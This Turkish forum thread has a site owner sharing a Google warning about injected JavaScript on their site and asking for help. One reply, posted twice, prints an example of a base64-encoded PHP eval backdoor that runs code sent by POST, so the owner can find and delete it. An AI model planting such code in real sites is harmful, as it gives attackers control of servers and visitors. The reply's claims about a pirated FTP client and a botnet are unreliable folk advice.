Evet Arkadaşlar google site yöneticisinden bir uyarı mesajı aldım.
ve Çevirisini Yaptığımda pek bir şey anlamadım olayın kavramını siteme hack girişimindemi bulunmuşlar acaba bu konuda bilgisi olan yardımcı olabilirmi acaba?
Dear site owner or webmaster of http://www.kralpop.gen.tr/,
We are writing to let you know that we believe some of your website’s pages may be hacked. Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "eval(function(p,a,c,k,e,r)". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search.
The following are example URLs from your site where we found such content:
http://www.kralpop.gen.tr/24-eve-ates-dustu.html
http://www.kralpop.gen.tr/abdullah-ocalanin-gozu-yasli.html
http://www.kralpop.gen.tr/acunun-aciklamasi-panpisi-kizdirdi.html
In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations.
We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.
More information about cleaning your site can be found at:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634
Sincerely, Google Search Quality Team
Buda Çevirisi
Sevgili site sahibi veya http://www.kralpop.gen.tr/ bir webmaster,
Biz size web sitenizin sayfalarını bazı kesmek olabilir inanıyorum bildirmek için yazıyoruz. Özellikle, JavaScript üçüncü bir şahıs tarafından sitenize enjekte edilmiş ve kullanıcıları zararlı sitelere yönlendirmek için kullanılabilir diye düşünüyorum. Siz bilmediğiniz JavaScript için kaynak kodu kontrol etmeli ve özellikle de içeren herhangi bir dosya "eval (function (p, a, c, k, e, r)". Zararlı kodu HTML olarak yerleştirilmiş olabilir, JavaScript veya PHP dosyaları bu yüzden aramanızda eksiksiz olması önemlidir.
Aşağıda, bu tür içeriği bulundu sitenizden örnek URL'ler şunlardır:
http://www.kralpop.gen.tr/24-eve-ates-dustu.html
http://www.kralpop.gen.tr/abdullah-ocalanin-gozu-yasli.html
http://www.kralpop.gen.tr/acunun-aciklamasi-panpisi-kizdirdi.html
Ayrıca, bu da mümkün sunucu yapılandırma dosyaları (örneğin Apache. Htaccess gibi) aşıldığını ifade etti. Bunun bir sonucu olarak, site gizleme olabilir ve sadece belirli durumlarda zararlı içeriğini gösteren olabilir.
Biz ziyaretçileri korumak için bu konuyu araştırmak için teşvik ediyoruz. Sitenizin tatlıya, yalnızca sayfalarınızdan kötü niyetli (ve genellikle gizli) içeriği kaldırmak değil, aynı zamanda belirlemek ve açığı gidermek için önemlidir. İyi bir ilk adım yardım için hosting teknik destek irtibata olabilir. Bu web yazılımı en son güvenlik güncellemeleri ve yamaları ile güncel olduğundan emin olmak da önemlidir.
Sitenizin temizleme hakkında daha fazla bilgi bulunabilir:
Google Site Yöneticisinden mesaj? |
4 Mesajlar | 773 Okunma | ||
- Üyelik 02.04.2011
- Yaş/Cinsiyet 35 / E
- Meslek E-ticaret Yöneticiliği
- Konum
- Ad Soyad A** S**
- Mesajlar 489
- Beğeniler 77 / 76
- Ticaret 0, (%0)
- Üyelik 05.08.2011
- Yaş/Cinsiyet 29 / E
- Meslek Para Yer
- Konum Ankara
- Ad Soyad O** B**
- Mesajlar 1007
- Beğeniler 176 / 201
- Ticaret 25, (%96)
iframe yerleştirilmiş olabilir sitede zararlı kodlar bulunmus
Modern ve Gelişmiş İddaa Tahmin Uygulaması Satışta !!!!
- Üyelik 02.04.2011
- Yaş/Cinsiyet 35 / E
- Meslek E-ticaret Yöneticiliği
- Konum
- Ad Soyad A** S**
- Mesajlar 489
- Beğeniler 77 / 76
- Ticaret 0, (%0)
iframe yerleştirilmiş olabilir sitede zararlı kodlar bulunmus
Peki Bunu nasıl temizleyebiliriz Temayi silerekmi yoksa yeni bir temami kullanmamamiz gerek ifarmeyi temayimi atmislar acaba
- Üyelik 06.04.2012
- Yaş/Cinsiyet - / E
- Meslek WebMaster
- Konum
- Ad Soyad ** **
- Mesajlar 94
- Beğeniler 17 / 10
- Ticaret 0, (%0)
temanın veya php dosyalarını bir bir incelemek zorundasın malsef. eğer botnet virüsü yemişsen pcndeki html,php,asp,jsp dosyalarına,usb flash,rar ve zip dosyalarına ve ağ bağlantına otomatik bulasır.pcne format atmak zorunda kalırsın. warez cutepftp kullanıyorsan o yapmıştır. filezilla yada flash xp kullan. ve dedgm gibi pc'nin temiz oldugunu düşünüyorsan php,html dosyalarını bir bir incele. elinle bulabilirsin.
iframe kod örnekleri:
base64le şifrelerler genellikle
< ? php eval(base64_decode('aWYoIWlzc2V0KCRpdXRrYTEpKXtmdW5jdGlvbiBpdXRrYSgkcyl7aWYocHJlZ19tYXRjaF9hbG
woJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRl
PXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpez
JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>"
örnek2:
<script></script>"
ya da echo komutu ile çekilir
echo ""
bu tarz kodlara rastlarsan elle silmen gerekir. kolay gelsin
iframe kod örnekleri:
base64le şifrelerler genellikle
< ? php eval(base64_decode('aWYoIWlzc2V0KCRpdXRrYTEpKXtmdW5jdGlvbiBpdXRrYSgkcyl7aWYocHJlZ19tYXRjaF9hbG
woJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRl
PXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpez
JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>"
örnek2:
<script></script>"
ya da echo komutu ile çekilir
echo ""
bu tarz kodlara rastlarsan elle silmen gerekir. kolay gelsin
Edebiyat ve Türkçe
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)